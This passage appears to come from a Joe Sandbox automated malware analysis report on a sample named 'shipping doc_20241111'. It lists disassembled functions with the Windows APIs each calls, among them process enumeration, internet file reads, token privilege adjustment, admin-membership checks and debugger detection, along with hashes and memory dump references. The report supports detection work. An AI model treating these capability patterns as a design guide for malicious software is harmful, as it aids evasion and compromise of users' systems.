Opcode Fuzzy Hash: b70b127d178c6f3218436f54b3a56aff924ab930b506007e1ef9a20cd58b8e65
Instruction Fuzzy Hash: 2951AF75A00210AFDB10AF24C986F2A7BA5AF45714F08809CE9059B3D3CB75AD42EBE1

Function 00FD1B74 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00FD1BF3
IsWindowEnabled.USER32 ref: 00FD1C01
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00FD1C0E
IsIconic.USER32 ref: 00FD1C1C
IsZoomed.USER32 ref: 00FD1C2A

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 546399631588b30cb14069d082eeff2fc205683961fc84bca7ef0bcda2f84c09
Instruction ID: 30c0c4a014e6c693de2cb1026d3645e98e2673f3b7cdc7b0ea0f243be94bb9fd
Opcode Fuzzy Hash: 546399631588b30cb14069d082eeff2fc205683961fc84bca7ef0bcda2f84c09
Instruction Fuzzy Hash: 8821D131B412156FE7208F2AC854B5A7BAAFF95320F1D806BE8498B342D775EC41EBD0

Function 00FCA5A3 Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00FCA5D3
Process32FirstW.KERNEL32(00000000,?), ref: 00FCA5E1

Part of subcall function 00F4B606: _wcslen.LIBCMT ref: 00F4B610

Process32NextW.KERNEL32(00000000,?), ref: 00FCA6C3
CloseHandle.KERNEL32(00000000), ref: 00FCA6D2

Part of subcall function 00F5D5DC: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00F84062,?), ref: 00F5D606

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: 5ee5afc7bc48dbfa79ccaec93db729c8c83cb92499562b3951accd38377e62c8
Instruction ID: 25148fedc392b0bb5b73fc530ccfb9a398449628ac8da7f54b210d500faeffb2
Opcode Fuzzy Hash: 5ee5afc7bc48dbfa79ccaec93db729c8c83cb92499562b3951accd38377e62c8
Instruction Fuzzy Hash: 05514771508301AFC710EF24CD86A6BBBE8FF89754F00492DF98597292EB74E904DB92

Function 00F7BB0F Relevance: 6.1, APIs: 4, Instructions: 90timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00F7BB1F

Part of subcall function 00F72958: RtlFreeHeap.NTDLL(00000000,00000000,?,00F7D771,00000000,00000000,00000000,00000000,?,00F7D798,00000000,00000007,00000000,?,00F7DB95,00000000), ref: 00F7296E
Part of subcall function 00F72958: GetLastError.KERNEL32(00000000,?,00F7D771,00000000,00000000,00000000,00000000,?,00F7D798,00000000,00000007,00000000,?,00F7DB95,00000000,00000000), ref: 00F72980

GetTimeZoneInformation.KERNEL32 ref: 00F7BB31
WideCharToMultiByte.KERNEL32(00000000,?,0101121C,000000FF,?,0000003F,?,?), ref: 00F7BBA9
WideCharToMultiByte.KERNEL32(00000000,?,01011270,000000FF,?,0000003F,?,?,?,0101121C,000000FF,?,0000003F,?,?), ref: 00F7BBD6

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
String ID:
API String ID: 806657224-0
Opcode ID: 9426c691f3bfb0e3b678096499191a6a6d4631d22a3d8b6bb0a300441784e252
Instruction ID: 9de2610851b65dde5b23796142ca44e021f1b231a2fc918babd8d17c5f8aff19
Opcode Fuzzy Hash: 9426c691f3bfb0e3b678096499191a6a6d4631d22a3d8b6bb0a300441784e252
Instruction Fuzzy Hash: 2531F4B0D04205EFCB15DF79CC80A69BBB4FF46320714829BE594D72A5D3399D10EB91

Function 00FBCD62 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 00FBCDA7
GetLastError.KERNEL32(?,00000000), ref: 00FBCE08
SetEvent.KERNEL32(?,?,00000000), ref: 00FBCE1C

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: 697d25338549e9e66be65423b276449165fe42fa4e90d7c2be646aa6d99f9da9
Instruction ID: 8f6fc958088a7ab416510162ee00e62c3bc0ffe2c8f30d0054a97355d93375f7
Opcode Fuzzy Hash: 697d25338549e9e66be65423b276449165fe42fa4e90d7c2be646aa6d99f9da9
Instruction Fuzzy Hash: 1D219076900305DBDB20DF66C849B9BB7F8EB44324F10442AE55696151D774EA04EFE0

Function 00FADADC Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00F85DF8), ref: 00FADAEC
GetFileAttributesW.KERNEL32(?), ref: 00FADAFB
FindFirstFileW.KERNEL32(?,?), ref: 00FADB0C
FindClose.KERNEL32(00000000), ref: 00FADB18

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 9efbf509365ac13318676f96c1c05c1b254923fcdfec096d97bd7daa910221b7
Instruction ID: 9357d5d9e5c5fba1be4903d3df020d3c21e6cc5a10eb46999f41b120d91c80e8
Opcode Fuzzy Hash: 9efbf509365ac13318676f96c1c05c1b254923fcdfec096d97bd7daa910221b7
Instruction Fuzzy Hash: A2F0E572811A25578210677CEC0D8AA37BE9E83335B114707F876C24F0D7705D94B6E5

Function 00FA81EE Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 00FA8200

Strings

(, xrefs: 00FA8246
|, xrefs: 00FA8230

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 83ce1e58c2f3084d91ea4842b5fbbbcf70806b64ada52e4f42f87ea7b9efd0df
Instruction ID: c59094bca96a52d653bdfd91dac8f6a566d7c6db30dd8253b9da664a20f2130b
Opcode Fuzzy Hash: 83ce1e58c2f3084d91ea4842b5fbbbcf70806b64ada52e4f42f87ea7b9efd0df
Instruction Fuzzy Hash: 2E325BB5A007059FCB28CF59C481A6AB7F0FF48760B15C56EE49ADB3A1DB70E942CB40

Function 00FB5BB5 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00FB5BDF
FindNextFileW.KERNEL32(00000000,?), ref: 00FB5C35
FindClose.KERNEL32(?), ref: 00FB5C7D

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 291d83eb95d85994661e875f022526e2ee73fca1a31178ddf48b005b8d60d272
Instruction ID: ce17c99cf91fea0e4f2e533b00e8053d0277b87b44a522d79bdea10eb9ec8f9f
Opcode Fuzzy Hash: 291d83eb95d85994661e875f022526e2ee73fca1a31178ddf48b005b8d60d272
Instruction Fuzzy Hash: DC518A75A00B019FC704DF29C890A9ABBE5FF49724F14855EE99A8B3A1CB34ED04DF91

Function 00F725B2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00F726AA
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00F726B4
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00F726C1

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: d574e906d271d51e959631332c1739c9a537f08d5fed2d10fe57f48b44c734d3
Instruction ID: 81a5a8e488b0ef2eb7db8ed7b97c33cf66bd38c21438fad7edc13c41542dfcd6
Opcode Fuzzy Hash: d574e906d271d51e959631332c1739c9a537f08d5fed2d10fe57f48b44c734d3
Instruction Fuzzy Hash: E331D47490121C9BCB61DF68DD8879DBBB8AF08310F5042EAE40CA7261EB349F859F55

Function 00FB50EB Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00FB50F8
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00FB5156
SetErrorMode.KERNEL32(00000000), ref: 00FB51BF

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 9588dea447b906d8d9269aa3bbe711be4a603c0ab6a8d4e19bd94c85d4925658
Instruction ID: d08a2a3cad8d231f6e4a82ef461b42283db84eb7bbe49bc1a9304c4594379728
Opcode Fuzzy Hash: 9588dea447b906d8d9269aa3bbe711be4a603c0ab6a8d4e19bd94c85d4925658
Instruction Fuzzy Hash: B4315C75A01518EFDB00DF65C884BEDBBB5FF48314F048099E8059B352DB35E856DB90

Function 00FA1607 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00F5FD5B: __CxxThrowException@8.LIBVCRUNTIME ref: 00F605E8
Part of subcall function 00F5FD5B: __CxxThrowException@8.LIBVCRUNTIME ref: 00F60605

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FA1651
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FA167E
GetLastError.KERNEL32 ref: 00FA168E

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: d12d079e061e097e60f3c3644a9f2e6af9612b9667504ece9485186673f694b3
Instruction ID: de2da105782bc692e515b5dba30d4269fd01482de6f6863fc19e895e7bc24a16
Opcode Fuzzy Hash: d12d079e061e097e60f3c3644a9f2e6af9612b9667504ece9485186673f694b3
Instruction Fuzzy Hash: 8B1101B2800305AFD718AF60DC86E6AB7BDFB05710B20812EF45693240DB70BC48DA64

Function 00FAD588 Relevance: 4.6, APIs: 3, Instructions: 55fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00FAD5A0
DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 00FAD5DD
CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00FAD5E6

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 3b16cce3cf139286bf36263a492c71fdd33216132837ffd9ec2331c72de5e6e8
Instruction ID: db89e39b6f4036ddbc283809ab33f7757faf5815a67393054f61012e18eefae6
Opcode Fuzzy Hash: 3b16cce3cf139286bf36263a492c71fdd33216132837ffd9ec2331c72de5e6e8
Instruction Fuzzy Hash: FF019EB2D01229BFE7109BA89C49FAFBBACEB09710F004616B901E7190D2744A0187E0

Function 00FA15A7 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00FA15D0
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00FA15E5
FreeSid.ADVAPI32(?), ref: 00FA15F5

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: cfa7489408e26773dad71e94e28399df250532b272aec8fd3715b35b9c498b0d
Instruction ID: a47f093a55188061f9a41f6b1248ba34bd07627b70520b96791337a13df5468e
Opcode Fuzzy Hash: cfa7489408e26773dad71e94e28399df250532b272aec8fd3715b35b9c498b0d
Instruction Fuzzy Hash: 12F0F47195130DFBDF00DFF49C89AAEBBBDFB08604F504565A501E2181E774AA44DBA0

Function 00F64C78 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,00F64C4E,00000003,010088C8,0000000C,00F64DA5,00000003,00000002,00000000,?,00F72879,00000003), ref: 00F64C99
TerminateProcess.KERNEL32(00000000,?,00F64C4E,00000003,010088C8,0000000C,00F64DA5,00000003,00000002,00000000,?,00F72879,00000003), ref: 00F64CA0
ExitProcess.KERNEL32 ref: 00F64CB2

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: b36d587c3e259b92931fdd542381242d08cc1af07cd4702c78cae2b478823426
Instruction ID: b14e7cb59b0a0a1ae7e1b5ac7ce5698eb0499acad2306c56bee10d45708ff8f8
Opcode Fuzzy Hash: b36d587c3e259b92931fdd542381242d08cc1af07cd4702c78cae2b478823426
Instruction Fuzzy Hash: E7E0B671512549AFCF11BF68EE09E583B6AEF44395F048015F8498A222CB39ED82EB90

Function 00FAE2D7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00FAE30B

Strings

DOWN, xrefs: 00FAE2F0

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: mouse_event
String ID: DOWN
API String ID: 2434400541-711622031
Opcode ID: eacfac13b1e864ea0051d8ba5c383e9cc8791a317832c4357f6cadd028a05af1
Instruction ID: 63837e95bb92917e85e15238837987cc570b8c5f0fce4b245dbfdf054633b8b2
Opcode Fuzzy Hash: eacfac13b1e864ea0051d8ba5c383e9cc8791a317832c4357f6cadd028a05af1
Instruction Fuzzy Hash: A7E0ECA65DD72739BD4931657C0AEF7138C8F17734B51024AF800EA5C1EE846C8275A9

Function 00F9DA16 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00F9DA28

Strings

X64, xrefs: 00F9DA44

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: 684792e28a7df80de3a5a9fa2176068501ea128def759a158a58cd8307fe8eef
Instruction ID: 74625a2f4034de7386473f57864f7ac873077893d5ab2ca533e3e56fe704bcc5
Opcode Fuzzy Hash: 684792e28a7df80de3a5a9fa2176068501ea128def759a158a58cd8307fe8eef
Instruction Fuzzy Hash: 88D0C9B580611DEADF90CBA0EC88ED9777CBB04304F100152F506E2040D7745548AF10

Function 00F6CA30 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebe32b9e9a0195b35bb6943144bf46fa156ca40a4ea5f4f8e36eb64e40b91145
Instruction ID: 3c21c8fc9b3f3e6f2c14944464635255bec3ad9b02c334b6522807331ff81237
Opcode Fuzzy Hash: ebe32b9e9a0195b35bb6943144bf46fa156ca40a4ea5f4f8e36eb64e40b91145
Instruction Fuzzy Hash: 65022D71E001199FDF14CFA9C8906AEBBF1FF88324F15826AD959E7380D731A941DB94

Function 00FB680C Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00FB6836
FindClose.KERNEL32(00000000), ref: 00FB687F

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 823859deda38abef063057287bcb7f54bada704d61b2de2ea2c0fc0c6bc34931
Instruction ID: c1004a91a91b21606070c1287ae5617fff93b1d5fe944410be6072388ea5f60d
Opcode Fuzzy Hash: 823859deda38abef063057287bcb7f54bada704d61b2de2ea2c0fc0c6bc34931
Instruction Fuzzy Hash: BC119371A042019FC710DF6AC884A15BBE5FF85324F55C6A9E8658F6A2C734EC05DB91

Function 00FB36D3 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00FC47B8,?,?,00000035,?), ref: 00FB3702
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00FC47B8,?,?,00000035,?), ref: 00FB3712

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 9478c7ac37d629fe04ea876b9ed4513ac3c455798b9dafc805bfab91f963907e
Instruction ID: e6dbdbd91c79a3db5f10c07a0057e251e4a0188512ac7b57df8e0be1bc7282fe
Opcode Fuzzy Hash: 9478c7ac37d629fe04ea876b9ed4513ac3c455798b9dafc805bfab91f963907e
